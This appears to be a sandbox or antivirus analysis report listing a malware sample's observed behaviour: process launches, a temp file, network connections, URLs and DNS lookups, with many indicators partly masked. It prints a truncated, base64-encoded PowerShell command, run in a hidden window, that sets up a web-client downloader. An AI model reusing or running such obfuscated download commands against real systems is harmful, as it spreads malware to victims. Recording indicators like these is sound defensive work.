Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAFgAQgBvAFoAMQB4AD0AKAAnAFYAQwBBAEQAQQBBACcAKwAnAFUAJwApADsAJABPAF8AbwBjAEEAVQBCAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1282297.cvr
- 'ud####amdhall.com':443
- '35.##9.240.78':80
- '17#.#28.25.132':80
- 'li####ylescape.com':80
- http://17#.#28.25.132/00akhwu/wS/
- http://li####ylescape.com/7njtmlx/Ew/
- 'ud####amdhall.com':443
- DNS ASK ud####amdhall.com
- DNS ASK li####ylescape.com
- DNS ASK pr#####y-in-vietnam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABmAFgAQgBvAFoAMQB4AD0AKAAnAFYAQwBBAEQAQQBBACcAKwAnAFUAJwApADsAJABPAF8AbwBjAEEAVQBCAGMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH...' (со скрытым окном)